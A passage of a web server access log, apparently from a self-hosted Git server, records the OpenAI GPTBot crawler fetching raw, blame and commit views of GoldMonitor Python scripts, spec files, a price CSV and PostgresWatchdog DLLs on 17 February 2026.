192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10262] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12359] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12626] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10999] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22184] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:14:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:14:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11487] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19888] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11520] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11376] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:14:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20871] [Gzip 10.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11793] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18409] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10828] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:14:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10370] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" -[17/Feb/2026:14:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:14:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12626] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21315] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:14:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 6692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18409] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 